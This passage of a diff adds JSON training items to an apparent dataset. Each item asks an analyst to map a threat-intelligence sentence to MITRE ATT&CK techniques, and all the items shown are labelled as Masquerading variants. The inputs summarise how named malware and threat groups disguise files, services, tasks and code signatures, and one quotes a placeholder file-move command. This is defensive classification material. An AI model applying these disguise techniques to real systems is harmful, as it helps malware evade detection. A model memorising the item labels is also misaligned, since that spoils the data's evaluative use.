microsoft_network.exe and crome.exe.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Raindrop was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2452 set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment. They also primarily used IP addresses originating from the same country as the victim for their VPN infrastructure.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WhisperGate has been disguised as a JPG extension to avoid detection as a malicious PE file.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XCSSET builds a malicious application bundle to resemble Safari through using the Safari icon and \"\"Info.plist\"\".\"", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT37 has signed its malware with an invalid digital certificates listed as \u201cTencent Technology (Shenzhen) Company Limited.\u201d", + "output": "- T1036.001: Masquerading - Invalid Code Signature" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gelsemium has used unverified signatures on malicious DLLs.", + "output": "- T1036.001: Masquerading - Invalid Code Signature" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PcShare has used an invalid certificate in attempt to appear legitimate.", + "output": "- T1036.001: Masquerading - Invalid Code Signature" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WindTail has been incompletely signed with revoked certificates.", + "output": "- T1036.001: Masquerading - Invalid Code Signature" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.", + "output": "- T1036.002: Masquerading - Right-to-Left Override" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.", + "output": "- T1036.002: Masquerading - Right-to-Left Override" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.", + "output": "- T1036.003: Masquerading - Rename System Utilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kevin has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.", + "output": "- T1036.003: Masquerading - Rename System Utilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Lazarus Group has renamed system utilities such as \"\"wscript.exe\"\" and \"\"mshta.exe\"\".\"", + "output": "- T1036.003: Masquerading - Rename System Utilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.", + "output": "- T1036.003: Masquerading - Rename System Utilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"A Lazarus Group custom backdoor implant included a custom PE loader named \"\"Security Package\"\" that was added into the lsass.exe process via registry key.\"", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT41 has created services to appear as benign system tools.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carbanak has copied legitimate service names to use for malicious services.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DCSrv has masqueraded its service as a legitimate svchost.exe process.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Green Lambert has created a new executable named `Software Update Check` to appear legitimate.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Heyoka Backdoor has been named `srvdll.dll` to appear as a legitimate service.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Higaisa named a shellcode loader binary \"\"svchast.exe\"\" to spoof the legitimate \"\"svchost.exe\"\".\"", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hildegard has disguised itself as a known Linux process.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has disguised services to appear as benign software or related to operating system functions.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OSX_OCEANLOTUS.D has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PingPull can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`, and `Onedrive` to evade detection.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tarrask creates a scheduled task called \u201cWinUpdate\u201d to re-establish any dropped C2 connections.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"UNC2452 named tasks \"\"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\"\" in order to appear legitimate.\"", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf. It has also used common document file names for other malware binaries.", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"build_downer has added itself to the Registry Run key as \"\"NVIDIA\"\" to appear legitimate.\"", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BADNEWS attempts to hide its payloads using legitimate filenames.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"BLINDINGCAN has attempted to hide its payload by using legitimate file names such as \"\"iconcache.db\"\".\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Bad Rabbit has masqueraded as a Flash Player installer through the executable file \"\"install_flash_player.exe\"\".\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bundlore has disguised a malicious .app file as a Flash Player update.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Chaes has used an unsigned, crafted DLL module named \"\"hha.dll\"\" that was designed to look like a legitimate 32-bit Windows DLL.\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DanBot files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Honeybee, the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Wocao, the threat actors renamed some tools and executables to appear as legitimate programs.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Earth Lusca used the command `move [file path] c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Felismus has masqueraded as legitimate Adobe Content Management System files.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ferocious Kitten has named malicious files \"\"update.exe\"\" and loaded them into the compromise host's \u201cPublic\u201d folder.\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Gamaredon Group has used legitimate process names to hide malware including \"\"svchosst\"\".\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"GoldenSpy's setup file installs initial executables under the folder \"\"%WinDir%\\System32\\PluginManager\"\".\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and 